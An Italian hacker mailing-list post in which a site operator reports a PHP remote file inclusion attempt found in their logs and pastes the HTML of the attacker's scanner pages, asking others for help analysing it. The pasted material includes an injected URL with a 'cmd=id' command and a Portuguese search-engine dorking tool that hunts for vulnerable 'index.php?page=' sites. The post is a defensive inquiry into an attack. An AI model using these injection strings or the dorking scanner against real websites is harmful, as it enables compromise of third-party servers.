[Hackmeeting] uno strano log

Delete this message

Reply to this message
Author: NeCoSi
Date:  
To: hackmeeting@inventati.org
New-Topics: [Hackmeeting] Una Cortesia
Subject: [Hackmeeting] uno strano log
dai log del sito geekplace.org ho letto uno strano log
si tratta di un php injection.

una cosa del tipo:
index.php?modulo=http//sito.com/script.php

seguendo quel link si trova quanto segue
se qualcuno ha voglia e sa fare una ricerca per capire di cosa si tratta
sarebbe interessante capire cosa succede in rete

da quel che ho notato è una sorta di motore di ricerca su
busca.uol.com.br ma non sono sicuro, forse sto prendendo un abbaglio io...
grazie, ciao






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head>
         <meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
         <meta name="Generator" content="AoD">
         <title>Scanning...</title>
    </head><body
onload="window.location='scan.php?id=35&sites=213.140.17.107-124622112306.txt';">Checking...
[34] -
http://www.darkreading.com/document.asp?doc_id=110363&f_src=http://busca.uol.com.br/uol/index.html?&cmd=id
- [Bug <b>OFF</b>]</body>
</html>





<body
onload="window.location='scan.php?id=0&sites=213.140.17.107-125047112306.txt';">
Aguarde... este processo pode levar alguns minutos.<br>



http://www.jaskiela.de/html/images/logos/.x/scan.php?id=39&sites=213.140.17.107-125047112306.txt







<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="pt-br">

<title>Scan v1.5.2</title><script type="text/javascript">
    function go() {
        var q = document.busca.q.value;
        if (q == '') {
            alert("Coloque todos os campos");
            return false;
        } else
        {
            if (document.mec.R1[0].checked)
            {
                window.location='google.php?q='+q;
            } else if (document.mec.R1[1].checked)
            {
                window.location='msn.php?q='+q;
            }
            return false;
        }
    }
    function show() {
        if (document.mec.R1[0].checked)
        {
            document.getElementById('exemplos').innerHTML =
'allinurl:index.php?page=';
        } else if (document.mec.R1[1].checked)
        {
            document.getElementById('exemplos').innerHTML =
'index.php?page=';
        }
    }


</script></head>




<body style="font-family: 'Lucida Console';" onload="show()">

<div align="center">
<center>

  <table border="0" cellspacing="1" height="74" width="400">
    <tbody><tr>
      <td height="19" width="400">
        <form method="post" action="#" style="margin: 0pt;"
onsubmit="return go();" name="busca">
          <p style="margin: 2px; font-size: 12px;">Busca: <input
name="q" size="31" style="border: 1px solid rgb(0, 0, 0); font-family:
'Lucida Console'; font-size: 12px;" type="text"> <input value="Start"
name="B1" style="border: 1px solid rgb(0, 0, 0); font-family: 'Lucida
Console'; font-size: 12px;" type="submit"></p>
        </form>
      </td>
    </tr>


    <tr>
      <td style="border-top: 1px solid rgb(0, 0, 0); border-bottom: 1px
solid rgb(0, 0, 0); font-size: 12px;" height="18" width="400"><p
style="margin: 2px;">Mecanismos &gt; <a id="exemplos" style="color:
rgb(255, 0, 0);"></a></p></td>
    </tr>
    <tr>
      <td height="19" width="400">
        <form method="post" action="#" style="margin: 0pt;" name="mec">
          <p style="margin: 2px; font-size: 12px;"><input value="V1"
checked="checked" name="R1" onclick="show();" type="radio">Google</p>


          <p style="margin: 2px; font-size: 12px;"><input name="R1"
value="V2" onclick="show();" type="radio">Search MSN</p>
        </form>
      </td>
    </tr>
  </tbody></table>
  </center>
</div>


</body></html>

--
Attualmente mi aggiro per http://GeekPlace.org
E Preferisco ricevere posta crittografata.
ID: 0x855C6C8C sul server: pgp.mit.edu

"Il fatto che un'opinione sia ampiamente condivisa, non è affatto una prova che non sia completamente assurda. Anzi, considerata la stupidità della maggioranza degli uomini, è più probabile che un'opinione diffusa sia cretina anziché sensata."
Bertrand Russell

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS/CM/IT a-- C++ L U+++ L++ W+++ PS+++ PE- PGP++ !tv G
------END GEEK CODE BLOCK------